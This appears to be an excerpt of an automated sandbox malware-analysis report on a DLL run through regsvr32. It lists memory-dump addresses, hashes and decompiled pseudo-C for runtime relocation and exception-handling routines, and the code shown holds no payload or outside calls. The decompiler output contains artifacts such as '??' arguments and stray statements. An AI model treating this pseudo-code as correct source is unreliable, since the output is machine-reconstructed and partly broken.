                                                                                                                      0x61a02591
                                                                                                                      0x61a02596
                                                                                                                      0x00000000
                                                                                                                      0x61a02598
                                                                                                                      0x61a02598
                                                                                                                      0x61a0259d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x61a025a3
                                                                                                                      0x61a025aa
                                                                                                                      0x61a025af
                                                                                                                      0x61a025b3
                                                                                                                      0x61a0266a
                                                                                                                      0x00000000
                                                                                                                      0x61a0266f
                                                                                                                      0x61a025b9
                                                                                                                      0x61a025bc
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x61a025c7
                                                                                                                      0x61a025d4
                                                                                                                      0x61a025d4
                                                                                                                      0x61a024aa
                                                                                                                      0x61a024af
                                                                                                                      0x61a02530
                                                                                                                      0x61a0253b
                                                                                                                      0x61a024b1
                                                                                                                      0x61a024b6
                                                                                                                      0x61a024c0
                                                                                                                      0x61a024c0
                                                                                                                      0x61a024ca
                                                                                                                      0x00000000
                                                                                                                      0x61a02600
                                                                                                                      0x61a024d3
                                                                                                                      0x61a024d9
                                                                                                                      0x61a024d9
                                                                                                                      0x61a024e7
                                                                                                                      0x61a024e7
                                                                                                                      0x61a024ec
                                                                                                                      0x61a024f3
                                                                                                                      0x61a024fc
                                                                                                                      0x61a02505
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x61a0250c
                                                                                                                      0x00000000
                                                                                                                      0x61a0250e
                                                                                                                      0x61a0261a
                                                                                                                      0x61a0261f
                                                                                                                      0x61a02626
                                                                                                                      0x61a0262c
                                                                                                                      0x61a02630
                                                                                                                      0x00000000
                                                                                                                      0x61a02635
                                                                                                                      0x61a02519
                                                                                                                      0x61a02519
                                                                                                                      0x61a024af
                                                                                                                      0x61a024a4
                                                                                                                      0x61a0249e
                                                                                                                      0x61a02497

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.925181874.0000000061A01000.00000020.00000001.01000000.00000006.sdmp, Offset: 61A00000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.925175993.0000000061A00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925188473.0000000061A04000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925194126.0000000061A05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925211021.0000000061A09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925215436.0000000061A0A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925219917.0000000061A0D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.926363512.0000000061AAA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_61a00000_regsvr32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: signal
                                                                                                                      • String ID: CCG
                                                                                                                      • API String ID: 1946981877-1584390748
                                                                                                                      • Opcode ID: 3fcbe9189c4475978d5f3dda471f7602364b4de6d25be4949d1e7bd441f74494
                                                                                                                      • Instruction ID: 408c87e3ce2834711b7e332f7442ff1a7854ea90cf7461c733e8ded45a0d6a36
                                                                                                                      • Opcode Fuzzy Hash: 3fcbe9189c4475978d5f3dda471f7602364b4de6d25be4949d1e7bd441f74494
                                                                                                                      • Instruction Fuzzy Hash: 9C319031A4570046FA651EB8B86036925119B8933EF2EC727CE3E873E1EA2ED8C54255
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 61A01C20 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 217memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 42%
                                                                                                                      			E61A01C20(int __eax, void* __ebx, void* __rax, void* __rbx, signed char* __rcx, void* __rdi, void* __rsi, signed long long __r8, signed int __r9, void* __r12) {
				void* _v40;
				char _v44;
				signed long long _v56;
				void* _v80;
				char _v104;
				int _t43;
				char _t47;
				long _t48;
				void* _t49;
				signed int _t60;
				void* _t61;
				void* _t63;
				signed int* _t71;
				intOrPtr* _t73;
				signed int _t74;
				long long _t75;
				signed int _t78;
				void* _t80;
				signed char* _t81;
				signed int _t113;
				void* _t118;

				_t115 = __r12;
				_t113 = __r9;
				_t106 = __r8;
				_t90 = __rdi;
				_t81 = __rcx;
				_t63 = __rax;
				_t43 = __eax;
				_push(__r12);
				_push(__rdi);
				_push(__rsi);
				_push(__rbx);
				r12d =  *0x61a08080;
				if(r12d == 0) {
					 *0x61a08080 = 1;
					E61A02A10(__eflags);
					_t43 = E61A02CB0(_t63);
					_t78 = 0x61a052b0;
					 *0x61a08090 = 0;
					 *0x61a08088 =  &_v104;
					__eflags = 0x61a052b0 - 7;
					if(0x61a052b0 <= 7) {
						goto L1;
					} else {
						__eflags = 0 - 0xb;
						if(0 <= 0xb) {
							L17:
							r9d =  *_t78;
							__eflags = r9d;
							if(r9d != 0) {
								goto L6;
							} else {
								r8d =  *(_t78 + 4);
								__eflags = r8d;
								if(r8d != 0) {
									goto L6;
								} else {
									goto L19;
								}
							}
						} else {
							_t60 =  *0x61a052b0; // 0x0
							__eflags = _t60;
							if(_t60 != 0) {
								L6:
								__eflags = _t78 - 0x61a052b0;
								if(_t78 >= 0x61a052b0) {
									goto L1;
								} else {
									do {
										r8d = 4;
										_t81 =  &(_t81[0x61a00000]);
										_t47 =  *_t81 +  *_t78;
										_t78 = _t78 + 8;
										_v44 = _t47;
										_t43 = L61A01AB0(_t47, _t78, _t81,  &_v44, 0x61a00000, 0x61a052b0, _t106, _t115, _t118);
										__eflags = _t78 - 0x61a052b0;
									} while (_t78 < 0x61a052b0);
									goto L9;
								}
							} else {
								r11d =  *0x61a052b4; // 0x0
								__eflags = r11d;
								if(r11d == 0) {
									r10d =  *0x61a052b8; // 0x0
									__eflags = r10d;
									if(r10d != 0) {
										L19:
										__eflags =  *(_t78 + 8) - 1;
										if( *(_t78 + 8) != 1) {
											L48:
											_t49 = E61A01A40(_t43, _t78, "  Unknown pseudo relocation protocol version %d.\n", _t86, _t90, 0x61a052b0, _t106, _t113, _t115, _t118);
											0;
											0;
											_t73 =  *0x61a04c00; // 0x61a03328
											_t74 =  *_t73;
											__eflags = _t74;
											while(_t74 != 0) {
												_t49 =  *_t74();
												_t75 =  *0x61a04c00; // 0x61a03328
												_t41 = _t75 + 8; // 0x61a03330
												_t42 = _t75 + 8; // 0x0
												_t74 =  *_t42;
												 *0x61a04c00 = _t41;
												__eflags = _t74;
											}
											return _t49;
										} else {
											_t80 = _t78 + 0xc;
											__eflags = _t80 - 0x61a052b0;
											if(_t80 < 0x61a052b0) {
												do {
													r8d =  *(_t80 + 8);
													_t43 = r8b & 0xffffffff;
													_t86 = _t86 + 0x61a00000;
													_t81 =  &(_t81[0x61a00000]);
													__eflags = _t43 - 0x10;
													_t113 =  *_t86;
													if(__eflags == 0) {
														r8d =  *_t81 & 0x0000ffff;
														__eflags = r8d & 0x00008000;
														if((r8d & 0x00008000) == 0) {
															goto L35;
														} else {
															_t106 = (_t106 | 0xffff0000) - _t86 + _t113;
															__eflags = _t106;
															_v56 = _t106;
															goto L34;
														}
													} else {
														if(__eflags > 0) {
															L26:
															__eflags = _t43 - 0x20;
															if(_t43 == 0x20) {
																r8d =  *_t81;
																__eflags = r8d & 0x80000000;
																if((r8d & 0x80000000) == 0) {
																	goto L35;
																} else {
																	_t106 = (_t106 | 0x00000000) - _t86 + _t113;
																	__eflags = _t106;
																	_v56 = _t106;
																	goto L41;
																}
															} else {
																__eflags = _t43 - 0x40;
																if(_t43 != 0x40) {
																	goto L25;
																} else {
																	_t113 = _t113 - _t86 +  *_t81;
																	__eflags = _t113;
																	_v56 = _t113;
																	goto L29;
																}
															}
														} else {
															__eflags = _t43 - 8;
															if(_t43 == 8) {
																r8d =  *_t81 & 0x000000ff;
																__eflags = r8b & 0x00000080;
																if((r8b & 0x00000080) == 0) {
																	L35:
																	_t106 = _t106 - _t86;
																	_t113 = _t113 + _t106;
																	__eflags = _t43 - 0x10;
																	_v56 = _t113;
																	if(__eflags == 0) {
																		L34:
																		_t86 =  &_v56;
																		r8d = 2;
																		_t43 = L61A01AB0(_t43, _t80, _t81, _t86, 0x61a00000, 0x61a052b0, _t106, 0, _t118);
																	} else {
																		if(__eflags > 0) {
																			__eflags = _t43 - 0x20;
																			if(_t43 == 0x20) {
																				L41:
																				_t86 =  &_v56;
																				r8d = 4;
																				_t43 = L61A01AB0(_t43, _t80, _t81, _t86, 0x61a00000, 0x61a052b0, _t106, 0, _t118);
																			} else {
																				__eflags = _t43 - 0x40;
																				if(_t43 == 0x40) {
																					L29:
																					_t86 =  &_v56;
																					r8d = 8;
																					_t43 = L61A01AB0(_t43, _t80, _t81, _t86, 0x61a00000, 0x61a052b0, _t106, 0, _t118);
																				}
																			}
																		} else {
																			__eflags = _t43 - 8;
																			if(_t43 == 8) {
																				goto L38;
																			}
																		}
																	}
																} else {
																	_t106 = (_t106 | 0xffffff00) - _t86 + _t113;
																	_v56 = _t106;
																	L38:
																	_t86 =  &_v56;
																	r8d = 1;
																	_t43 = L61A01AB0(_t43, _t80, _t81, _t86, 0x61a00000, 0x61a052b0, _t106, 0, _t118);
																}
															} else {
																L25:
																_t81 = "  Unknown pseudo relocation bit size %d.\n";
																_v56 = 0;
																_t43 = E61A01A40(_t43, _t80, _t81, _t86, 0x61a00000, 0x61a052b0, _t106, _t113, 0, _t118);
																goto L26;
															}
														}
													}
													_t80 = _t80 + 0xc;
													__eflags = _t80 - 0x61a052b0;
												} while (_t80 < 0x61a052b0);
												L9:
												__eflags =  *0x61a08090;
												if( *0x61a08090 > 0) {
													_t61 = 0;
													_t115 = VirtualQuery;
													_t90 = VirtualProtect;
													do {
														_t71 = _t78 +  *0x61a08088;
														__eflags =  *_t71;
														if( *_t71 == 0) {
															goto L11;
														} else {
															r8d = 0x30;
															_t86 =  &_v104;
															_t48 = VirtualQuery(??, ??, ??);
															__eflags = _t71;
															if(_t71 == 0) {
																_t78 = _t78 +  *0x61a08088;
																__eflags = _t78;
																_t106 =  *(_t78 + 8);
																_t43 = E61A01A40(_t48, _t78, "  VirtualQuery failed for %d bytes at address %p",  &_v104, _t90, 0x61a052b0,  *(_t78 + 8), _t113, _t115, _t118);
																goto L48;
															} else {
																_t113 =  &_v44;
																r8d =  *( *0x61a08088 + _t78);
																_t43 = VirtualProtect(??, ??, ??, ??);
																goto L11;
															}
														}
														goto L51;
														L11:
														_t61 = _t61 + 1;
														_t78 = _t78 + 0x18;
														__eflags = _t61 -  *0x61a08090;
													} while (_t61 <  *0x61a08090);
												}
											}
											goto L1;
										}
									} else {
										_t78 = 0x61a052bc;
										goto L17;
									}
								} else {
									goto L6;
								}
							}
						}
					}
				} else {
					L1:
					return _t43;
				}
				L51:
			}
























                                                                                                                      0x61a01c20
                                                                                                                      0x61a01c20
                                                                                                                      0x61a01c20
                                                                                                                      0x61a01c20
                                                                                                                      0x61a01c20
                                                                                                                      0x61a01c20
                                                                                                                      0x61a01c20
                                                                                                                      0x61a01c24
                                                                                                                      0x61a01c26
                                                                                                                      0x61a01c27
                                                                                                                      0x61a01c28
                                                                                                                      0x61a01c2d
                                                                                                                      0x61a01c37
                                                                                                                      0x61a01c44
                                                                                                                      0x61a01c4e
                                                                                                                      0x61a01c65
                                                                                                                      0x61a01c71
                                                                                                                      0x61a01c78
                                                                                                                      0x61a01c8a
                                                                                                                      0x61a01c97
                                                                                                                      0x61a01c9b
                                                                                                                      0x00000000
                                                                                                                      0x61a01c9d
                                                                                                                      0x61a01c9d
                                                                                                                      0x61a01ca1
                                                                                                                      0x61a01d90
                                                                                                                      0x61a01d90
                                                                                                                      0x61a01d93
                                                                                                                      0x61a01d96
                                                                                                                      0x00000000
                                                                                                                      0x61a01d9c
                                                                                                                      0x61a01d9c
                                                                                                                      0x61a01da0
                                                                                                                      0x61a01da3
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x61a01da3
                                                                                                                      0x61a01ca7
                                                                                                                      0x61a01ca7
                                                                                                                      0x61a01cad
                                                                                                                      0x61a01caf
                                                                                                                      0x61a01cc1
                                                                                                                      0x61a01cc1
                                                                                                                      0x61a01cc4
                                                                                                                      0x00000000
                                                                                                                      0x61a01cca
                                                                                                                      0x61a01cd1
                                                                                                                      0x61a01cd8
                                                                                                                      0x61a01cde
                                                                                                                      0x61a01ce3
                                                                                                                      0x61a01ce5
                                                                                                                      0x61a01ce9
                                                                                                                      0x61a01cec
                                                                                                                      0x61a01cf1
                                                                                                                      0x61a01cf1
                                                                                                                      0x00000000
                                                                                                                      0x61a01cd1
                                                                                                                      0x61a01cb1
                                                                                                                      0x61a01cb1
                                                                                                                      0x61a01cb8
                                                                                                                      0x61a01cbb
                                                                                                                      0x61a01d78
                                                                                                                      0x61a01d7f
                                                                                                                      0x61a01d82
                                                                                                                      0x61a01da9
                                                                                                                      0x61a01dac
                                                                                                                      0x61a01daf
                                                                                                                      0x61a01f17
                                                                                                                      0x61a01f1e
                                                                                                                      0x61a01f29
                                                                                                                      0x61a01f2d
                                                                                                                      0x61a01f34
                                                                                                                      0x61a01f3b
                                                                                                                      0x61a01f3e
                                                                                                                      0x61a01f41
                                                                                                                      0x61a01f43
                                                                                                                      0x61a01f45
                                                                                                                      0x61a01f4c
                                                                                                                      0x61a01f50
                                                                                                                      0x61a01f50
                                                                                                                      0x61a01f54
                                                                                                                      0x61a01f5b
                                                                                                                      0x61a01f5b
                                                                                                                      0x61a01f64
                                                                                                                      0x61a01db5
                                                                                                                      0x61a01db5
                                                                                                                      0x61a01db9
                                                                                                                      0x61a01dbc
                                                                                                                      0x61a01dd3
                                                                                                                      0x61a01dd8
                                                                                                                      0x61a01ddc
                                                                                                                      0x61a01de0
                                                                                                                      0x61a01de3
                                                                                                                      0x61a01de6
                                                                                                                      0x61a01de9
                                                                                                                      0x61a01dec
                                                                                                                      0x61a01e46
                                                                                                                      0x61a01e4a
                                                                                                                      0x61a01e51
                                                                                                                      0x00000000
                                                                                                                      0x61a01e53
                                                                                                                      0x61a01e5d
                                                                                                                      0x61a01e5d
                                                                                                                      0x61a01e60
                                                                                                                      0x00000000
                                                                                                                      0x61a01e60
                                                                                                                      0x61a01dee
                                                                                                                      0x61a01dee
                                                                                                                      0x61a01e11
                                                                                                                      0x61a01e11
                                                                                                                      0x61a01e14
                                                                                                                      0x61a01e9c
                                                                                                                      0x61a01e9f
                                                                                                                      0x61a01ea6
                                                                                                                      0x00000000
                                                                                                                      0x61a01ea8
                                                                                                                      0x61a01eae
                                                                                                                      0x61a01eae
                                                                                                                      0x61a01eb1
                                                                                                                      0x00000000
                                                                                                                      0x61a01eb1
                                                                                                                      0x61a01e1a
                                                                                                                      0x61a01e1a
                                                                                                                      0x61a01e1d
                                                                                                                      0x00000000
                                                                                                                      0x61a01e1f
                                                                                                                      0x61a01e22
                                                                                                                      0x61a01e22
                                                                                                                      0x61a01e25
                                                                                                                      0x00000000
                                                                                                                      0x61a01e25
                                                                                                                      0x61a01e1d
                                                                                                                      0x61a01df0
                                                                                                                      0x61a01df0
                                                                                                                      0x61a01df3
                                                                                                                      0x61a01ec9
                                                                                                                      0x61a01ecd
                                                                                                                      0x61a01ed1
                                                                                                                      0x61a01e75
                                                                                                                      0x61a01e75
                                                                                                                      0x61a01e78
                                                                                                                      0x61a01e7b
                                                                                                                      0x61a01e7e
                                                                                                                      0x61a01e82
                                                                                                                      0x61a01e64
                                                                                                                      0x61a01e64
                                                                                                                      0x61a01e68
                                                                                                                      0x61a01e6e
                                                                                                                      0x61a01e84
                                                                                                                      0x61a01e84
                                                                                                                      0x61a01ee6
                                                                                                                      0x61a01ee9
                                                                                                                      0x61a01eb5
                                                                                                                      0x61a01eb5
                                                                                                                      0x61a01eb9
                                                                                                                      0x61a01ebf
                                                                                                                      0x61a01eeb
                                                                                                                      0x61a01eeb
                                                                                                                      0x61a01eee
                                                                                                                      0x61a01e29
                                                                                                                      0x61a01e29
                                                                                                                      0x61a01e2d
                                                                                                                      0x61a01e33
                                                                                                                      0x61a01e33
                                                                                                                      0x61a01eee
                                                                                                                      0x61a01e86
                                                                                                                      0x61a01e86
                                                                                                                      0x61a01e89
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x61a01e89
                                                                                                                      0x61a01e84
                                                                                                                      0x61a01ed3
                                                                                                                      0x61a01edd
                                                                                                                      0x61a01ee0
                                                                                                                      0x61a01e8b
                                                                                                                      0x61a01e8b
                                                                                                                      0x61a01e8f
                                                                                                                      0x61a01e95
                                                                                                                      0x61a01e95
                                                                                                                      0x61a01df9
                                                                                                                      0x61a01df9
                                                                                                                      0x61a01df9
                                                                                                                      0x61a01e04
                                                                                                                      0x61a01e0c
                                                                                                                      0x00000000
                                                                                                                      0x61a01e0c
                                                                                                                      0x61a01df3
                                                                                                                      0x61a01dee
                                                                                                                      0x61a01e38
                                                                                                                      0x61a01e3c
                                                                                                                      0x61a01e3c
                                                                                                                      0x61a01cf6
                                                                                                                      0x61a01cfc
                                                                                                                      0x61a01cfe
                                                                                                                      0x61a01d06
                                                                                                                      0x61a01d08
                                                                                                                      0x61a01d0f
                                                                                                                      0x61a01d33
                                                                                                                      0x61a01d36
                                                                                                                      0x61a01d3f
                                                                                                                      0x61a01d41
                                                                                                                      0x00000000
                                                                                                                      0x61a01d43
                                                                                                                      0x61a01d47
                                                                                                                      0x61a01d4d
                                                                                                                      0x61a01d51
                                                                                                                      0x61a01d54
                                                                                                                      0x61a01d57
                                                                                                                      0x61a01ef9
                                                                                                                      0x61a01ef9
                                                                                                                      0x61a01f0b
                                                                                                                      0x61a01f12
                                                                                                                      0x00000000
                                                                                                                      0x61a01d5d
                                                                                                                      0x61a01d64
                                                                                                                      0x61a01d70
                                                                                                                      0x61a01d74
                                                                                                                      0x00000000
                                                                                                                      0x61a01d74
                                                                                                                      0x61a01d57
                                                                                                                      0x00000000
                                                                                                                      0x61a01d20
                                                                                                                      0x61a01d20
                                                                                                                      0x61a01d23
                                                                                                                      0x61a01d27
                                                                                                                      0x61a01d27
                                                                                                                      0x61a01d33
                                                                                                                      0x61a01cfe
                                                                                                                      0x00000000
                                                                                                                      0x61a01dbc
                                                                                                                      0x61a01d84
                                                                                                                      0x61a01d84
                                                                                                                      0x00000000
                                                                                                                      0x61a01d84
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x61a01cbb
                                                                                                                      0x61a01caf
                                                                                                                      0x61a01ca1
                                                                                                                      0x61a01c39
                                                                                                                      0x61a01c39
                                                                                                                      0x61a01c43
                                                                                                                      0x61a01c43
                                                                                                                      0x00000000

                                                                                                                      APIs
                                                                                                                      • VirtualQuery.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61A01325), ref: 61A01D51
                                                                                                                      • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61A01325), ref: 61A01D74
                                                                                                                      Strings
                                                                                                                      • VirtualQuery failed for %d bytes at address %p, xrefs: 61A01F00
                                                                                                                      • Unknown pseudo relocation bit size %d., xrefs: 61A01DF9
                                                                                                                      • Unknown pseudo relocation protocol version %d., xrefs: 61A01F17
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.925181874.0000000061A01000.00000020.00000001.01000000.00000006.sdmp, Offset: 61A00000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.925175993.0000000061A00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925188473.0000000061A04000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925194126.0000000061A05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925211021.0000000061A09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925215436.0000000061A0A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925219917.0000000061A0D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.926363512.0000000061AAA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_61a00000_regsvr32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Virtual$ProtectQuery
                                                                                                                      • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$ VirtualQuery failed for %d bytes at address %p
                                                                                                                      • API String ID: 1027372294-974437099
                                                                                                                      • Opcode ID: 8bd380c94b28c8d9d271e995fd0ab6fd8a9cac0372390b7e1eaa7f36abc0226e
                                                                                                                      • Instruction ID: 4c30b9f4c3d955d98051024508d2bbe64359917e3c1e831d22090834e0a95482
                                                                                                                      • Opcode Fuzzy Hash: 8bd380c94b28c8d9d271e995fd0ab6fd8a9cac0372390b7e1eaa7f36abc0226e
                                                                                                                      • Instruction Fuzzy Hash: 25819AB2B1265486EB01CFA5F9807ED3771B749BAEF9C8206DD1817B94CB3AC995C301
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 61A01050 Relevance: 7.6, APIs: 5, Instructions: 146sleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.925181874.0000000061A01000.00000020.00000001.01000000.00000006.sdmp, Offset: 61A00000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.925175993.0000000061A00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925188473.0000000061A04000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925194126.0000000061A05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925211021.0000000061A09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925215436.0000000061A0A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.925219917.0000000061A0D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.926363512.0000000061AAA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_61a00000_regsvr32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep$_amsg_exit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2363106680-0
                                                                                                                      • Opcode ID: 9b71d81bd554efcca135a58034e7555392f48d5739a389bdfe5b6a6e309bdeda
                                                                                                                      • Instruction ID: 3ef318653ee0572cd762a2b9bffd9e274af41ba5bfb31a43706fd8a56dd143cf
                                                                                                                      • Opcode Fuzzy Hash: 9b71d81bd554efcca135a58034e7555392f48d5739a389bdfe5b6a6e309bdeda
                                                                                                                      • Instruction Fuzzy Hash: A1515231B1370589FB069BA5F9803E522A2BB8C79FF0C8539C91D87360EE3AC4D59346
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 61A021C0 Relevance: 7.6, APIs: 5, Instructions: 98COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 75%
                                                                                                                      			E61A021C0(long long* __rax, intOrPtr* __rcx) {
				intOrPtr _v16;
				intOrPtr _t3;
				long long* _t17;
				long long* _t37;
				long long* _t38;

				_t35 = __rax;
				_t3 =  *__rcx;
				if(_t3 > 0xc0000091) {
					__eflags = _t3 - 0xc0000094;
					if(__eflags == 0) {
						_t17 = 0;
						goto L3;
					} else {
						if(__eflags > 0) {
							__eflags = _t3 - 0xc0000095;
							if(_t3 == 0xc0000095) {
								goto L27;
							} else {
								__eflags = _t3 - 0xc0000096;
								if(_t3 != 0xc0000096) {
									goto L11;
								} else {
									goto L21;
								}
							}
						} else {
							__eflags = _t3 - 0xc0000092;
							if(_t3 == 0xc0000092) {
								goto L27;
							} else {
								__eflags = _t3 - 0xc0000093;
								if(_t3 == 0xc0000093) {
									goto L2;
								} else {
									goto L11;
								}
							}
						}
					}
				} else {
					if(_t3 < 0xc000008d) {
						__eflags = _t3 - 0xc0000008;
						if(__eflags == 0) {
							L27:
							__eflags = 0;
							return 0;
						} else {
							if(__eflags > 0) {
								__eflags = _t3 - 0xc000001d;
								if(_t3 == 0xc000001d) {
									L21:
									L61A02D80();
									__eflags = _t35 - 1;
									_t38 = _t35;
									if(_t35 == 1) {
										L61A02D80();
										return 0;
									}
									__eflags = _t38;
									_t4 = 4;
									if(_t38 != 0) {
										 *_t38();
										return 0;
									}
									goto L6;
								} else {
									__eflags = _t3 - 0xc000008c;
									if(_t3 != 0xc000008c) {
										goto L11;
									} else {
										goto L27;
									}
								}
							} else {
								__eflags = _t3 - 0x80000002;
								if(_t3 == 0x80000002) {
									goto L27;
								} else {
									__eflags = _t3 - 0xc0000005;
									if(_t3 != 0xc0000005) {
										L11:
										return 1;
									} else {
										L61A02D80();
										__eflags = __rax - 1;
										if(__rax == 1) {
											L61A02D80();
											return 0;
										}
										__eflags = __rax;
										_t4 = 4;
										if(__rax != 0) {
											 *__rax();
											return 0;
										}
										goto L6;
									}
								}
							}
						}
					} else {
						L2:
						_t17 = 1;
						L3:
						L61A02D80();
						_t37 = _t35;
						if(_t35 == 1) {
							L61A02D80();
							_t4 = 0;
							__eflags = _t17;
							if(_t17 != 0) {
								_v16 = 0;
								E61A02CA0(0);
								return _v16;
							}
						} else {
							_t4 = 1;
							if(_t37 != 0) {
								 *_t37();
								return 0;
							}
						}
						L6:
						return _t4;
					}
				}
			}








                                                                                                                      0x61a021c0
                                                                                                                      0x61a021c5
                                                                                                                      0x61a021cc
                                                                                                                      0x61a02210
                                                                                                                      0x61a02215
                                                                                                                      0x61a022e0
                                                                                                                      0x00000000
                                                                                                                      0x61a0221b
                                                                                                                      0x61a0221b
                                                                                                                      0x61a02294
                                                                                                                      0x61a02299
                                                                                                                      0x00000000
                                                                                                                      0x61a0229b
                                                                                                                      0x61a0229b
                                                                                                                      0x61a022a0
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x61a022a0
                                                                                                                      0x61a0221d
                                                                                                                      0x61a0221d
                                                                                                                      0x61a02222
                                                                                                                      0x00000000
                                                                                                                      0x61a02228
                                                                                                                      0x61a02228
                                                                                                                      0x61a0222d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x61a0222d
                                                                                                                      0x61a02222
                                                                                                                      0x61a0221b
                                                                                                                      0x61a021ce
                                                                                                                      0x61a021d3
                                                                                                                      0x61a02240
                                                                                                                      0x61a02245
                                                                                                                      0x61a02302
                                                                                                                      0x61a02302
                                                                                                                      0x61a02309
                                                                                                                      0x61a0224b
                                                                                                                      0x61a0224b
                                                                                                                      0x61a022f0
                                                                                                                      0x61a022f5
                                                                                                                      0x61a022a2
                                                                                                                      0x61a022a9
                                                                                                                      0x61a022ae
                                                                                                                      0x61a022b2
                                                                                                                      0x61a022b5
                                                                                                                      0x61a0234c
                                                                                                                      0x00000000
                                                                                                                      0x61a02351
                                                                                                                      0x61a022bb
                                                                                                                      0x61a022be
                                                                                                                      0x61a022c3
                                                                                                                      0x61a022ce
                                                                                                                      0x00000000
                                                                                                                      0x61a022d0
                                                                                                                      0x00000000
                                                                                                                      0x61a022f7
                                                                                                                      0x61a022f7
                                                                                                                      0x61a022fc
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x61a022fc
                                                                                                                      0x61a02251
                                                                                                                      0x61a02251
                                                                                                                      0x61a02256
                                                                                                                      0x00000000
                                                                                                                      0x61a0225c
                                                                                                                      0x61a0225c
                                                                                                                      0x61a02261
                                                                                                                      0x61a0222f
                                                                                                                      0x61a02239
                                                                                                                      0x61a02263
                                                                                                                      0x61a0226a
                                                                                                                      0x61a0226f
                                                                                                                      0x61a02276
                                                                                                                      0x61a0233b
                                                                                                                      0x00000000
                                                                                                                      0x61a02340
                                                                                                                      0x61a0227c
                                                                                                                      0x61a0227f
                                                                                                                      0x61a02284
                                                                                                                      0x61a0228b
                                                                                                                      0x00000000
                                                                                                                      0x61a0228d
                                                                                                                      0x00000000
                                                                                                                      0x61a02284
                                                                                                                      0x61a02261
                                                                                                                      0x61a02256
                                                                                                                      0x61a0224b
                                                                                                                      0x61a021d5
                                                                                                                      0x61a021d5
                                                                                                                      0x61a021d5
                                                                                                                      0x61a021da
                                                                                                                      0x61a021e1
                                                                                                                      0x61a021ea
                                                                                                                      0x61a021ed
                                                                                                                      0x61a02315
                                                                                                                      0x61a0231a
                                                                                                                      0x61a0231c
                                                                                                                      0x61a0231e
                                                                                                                      0x61a02324
                                                                                                                      0x61a02328
                                                                                                                      0x00000000
                                                                                                                      0x61a0232d
                                                                                                                      0x61a021f3
                                                                                                                      0x61a021f6
                                                                                                                      0x61a021fb
                                                                                                                      0x61a02202
                                                                                                                      0x00000000
                                                                                                                      0x61a02204
                                                                                                                      0x61a021fb
                                                                                                                      0x61a0220b
                                                                                                                      0x61a0220b
                                                                                                                      0x61a0220b
